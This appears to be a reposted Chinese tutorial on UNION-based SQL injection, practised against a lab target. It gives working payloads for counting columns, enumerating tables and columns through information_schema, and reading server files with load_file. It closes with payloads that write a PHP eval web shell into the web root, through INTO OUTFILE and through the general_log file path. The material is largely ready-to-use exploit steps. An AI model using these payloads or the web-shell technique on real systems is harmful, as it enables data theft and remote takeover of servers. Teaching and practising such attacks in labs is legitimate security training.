SQL注入漏洞之联合查询

Posted Small World Safety

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了SQL注入漏洞之联合查询相关的知识,希望对你有一定的参考价值。

1.背景:SQL注入是比较常见的网络攻击方式之一,利用系统的bug进行攻击

2.本质:违背了数据与代码分离的原则。

3.学习目的:为了摆脱工具的依赖性,目前厂商对能够对部分工具进行识别,所以,少年你得加油了!

4.产生条件:

    1.我们能够控制输入的内容

    2.web应用程序把我们输入的内容带入到数据库执行

5.sql注入原理:对用户输入过滤不严格

6.攻击思路:

  1. 寻找能够修改SQL数据的位置(一般情况进行数据查询)

  2. 判断数据库类型

  3. 针对不同数据库特点进行SQL注入攻击

7.SQL注入分类:

    SQL注入攻击根据应用程序处理返回数据库内容的不同,可以分为显错注 入、报错注入、盲注。

按照注入点类型划分:

    数字型注入和字符型注入

按数据提交方式划分:

    get,post,cookie,http头部注入

按照执行效果来划分:

    布尔盲注,延时注入,报错注入,联合查询注入,堆查询注入,宽字节注入

payload:载荷,屏蔽载荷,‘-- ’或者 #,

替换空格:/**/ 

OK,那开始

    (采用东塔靶场,大家需要可以自己找一下啊)

先判断是否有注入点:为get注入

一.判断注入类型

1=1为true,1=2为false  此为数字型注入,如图,1=2为false,1=1为true

存在注入,(%20)是url编码中的空格

概念

    select 后面字段名相当于变量名

    from 后面的是结果集,表是结果集的一种,如果对结果集进行二次查询

    order by对结果集(user)按照列(相当于程序语言中的实体对象)进行排序,默认升序排序,降序需要后面添加desc

    group by分组汇总

    limit 从结果集第m条记录开始获取n记录 

sql 语句

SELECT * FROM `users` WHERE `user_id`='1' ORDER BY 10;

payload

1' ORDER BY 10-- 

构造payload,

二.确定查询字段数

语句后面连接 order by判断查询表达式数量

SQL注入漏洞之联合查询

order by 9--+

SQL注入漏洞之联合查询

我靠,我实在太天才了,可以去买彩票了,

经分析:8列数据。

三.确定数据显示位

sql union操作符:用于合并两个或多个select语句的结果集

    注意:union内部的每个select语句必须拥有相同数量的列,列也必须拥有相似数据类型,同时每个select语句中的列的顺序必须相同。

由此可知,列数必须相同。。。


SQL注入漏洞之联合查询

8列数据(order by 给出)

四:获取信息

用获取信息的函数替换全局变量替换显示位(1)

    注意:第一个查询的值已经展示到页面上,让第一个查询出错没有值,SQL查询不做限制情况下,每次只能查询一跳语句,所以要让前面的值不存在,后面查询的值替换这个位置即可看到占位的位置SQL注入漏洞之联合查询

每一个都是一个占位。


(1)获取环境相关信息

SQL注入漏洞之联合查询


函数、全局变量

说明
version() 数据库系统版本
@@datadir 数据库文件路径
@@basedir mysql 安装路径
user() 用户名
current_user() 当前用户名
system_user() 系统用户名
database() 当前打开的数据库名

获取系统信息,database()=dotaxueyuan

获取数据库表的数量

information_schema保存所有表和字段信息的库。


(2)获取表的相关信息

聚合函数

count() 计数
sum() 求和
avg() 平均值
函数名 说明
max() 最大值
min() 最小值

count(*)替换显示位获取当前数据库的表的数量

表的数量

payload

-1 union select 1,2,count(*),4,5,6,7,8 from information_schema.tables where table_schema = database() --+

SQL注入漏洞之联合查询


关键表: information_schema.tables 数据库中所有表的信息字符串合并函数

函数名 说明
concat() 横向合并
group_concat() 纵向合并

sql 语句

表的名称

-1% union select 1,2,table_name,4,5,6,7,8%20from information_schema.tables where table_schema = database() --+

-1%20union%20select%201,2,column_name,4,5,6,7,8%20from%20information_schema.columns%20where%20table_schema%20=%20database()%20--+

SQL注入漏洞之联合查询

table_name(表名)=key,users

SQL注入漏洞之联合查询

-1 UNION SELECT GROUP_CONCAT(table_name),2,3,4,5,6,7,8 FROM information_schema.tables WHERE table_schema=database() --+

2个和8个

表的数量

SQL注入漏洞之联合查询

表的列名:id,key


表的数据,检验一下大家,看看掌握没,最后一步,就可以获取相关key

获取不到的话,请重新在自己测试一下,一步一步,直到掌握。

key

一般情况下获取到数据,就可以查找后台,根据后台进行下一步操作

但如果有相应权限的话,就可以进行文件读写操作(磁盘操作)

磁盘操作

常用函数或全局变量

函数名或全局变量 说明
load_file() 从磁盘文件读取内容
into outfile 文件名 向磁盘文件写入内容
set general_log=on 把数据库系统日志记录打开
set general_log_file=文件名 设置日志文件路径

读取文件:

可以进行本地测试:

  • mysql 读取本地文件配置

打开 my.ini 文件,在 [mysqld] 下添加一行

[mysqld]
secure_file_priv =
  • 确认当前用户有读取文件权限

sql 语句

SELECT first_name, last_name FROM users where user_id=1 and (SELECT count(*) FROM mysql.user) > 0 --
-1 and (SELECT count(*) FROM mysql.user) > 0 --

如果查询内容正常显示表示有读写权限,否则当前数据库用户没有读写权限

读写权限

  • 读取文件内容

sql 语句

SELECT first_name, last_name FROM users WHERE user_id=-1 UNION SELECT load_file('c:/xxxx/htdocs/s.php'),2,3,4,5,6,7,8 --+

payload

-1 UNION SELECT load_file('c:/xxx/php/php.ini'),2,3,4,5,6,7,8 --+

写文件

同上配置 mysql 读取文件权限,并确认用户读写权限正常写入文件 sql 语句

SELECT first_name, last_name FROM users INTO OUTFILE 'c:/xxx/htdocs/test.txt'

渗透 sql 语句

SELECT first_name, last_name FROM users WHERE user_id=-1 UNION SELECT '<?php eval($_REQUEST["cmd"]);?>',2,3,4,5,6,7,8 INTO OUTFILE 'c:/xxx/htdocs/ma.php'#

payload

-1 UNION SELECT '<?php eval($_REQUEST["cmd"]);?>',2,3,4,5,6,7,8 INTO OUTFILE 'E:/phpStudy_64/phpstudy_pro/www/ma.php'#

写日志

  • 查询系统日志状态 sql 语句1

show variables like '%general_log%';
Variable_name Value
general_log OFF
general_log_file DESKTOP-9DKPNQG.log
  • 设置日志开启

set global general_log=ON;
  • 设置日志路径

set global general_log_file='c:\xxxx\htdocs\m.php';

启动日志后所有查询语句都会记录在日志里,可以执行任何包含攻击代码的查询,使语句进入日志,再通过日志文件发动攻击

开始插入广告:



以上是关于SQL注入漏洞之联合查询的主要内容,如果未能解决你的问题,请参考以下文章

NSATP-A学习笔记之Day3-3SQL联合查询

SQL注入之MySQL

第三天--注入攻击:Web安全之SQL注入漏洞专题

SQL注入之GET型(search)

安全测试 web安全测试 常规安全漏洞 可能存在SQL和JS注入漏洞场景分析。为什么自己没有找到漏洞,哪么可能存在漏洞场景是?SQL注入漏洞修复 JS注入漏洞修复 漏洞存在场景分析和修复示例(代码片段

pikachu漏洞平台sql注入 之 数字型注入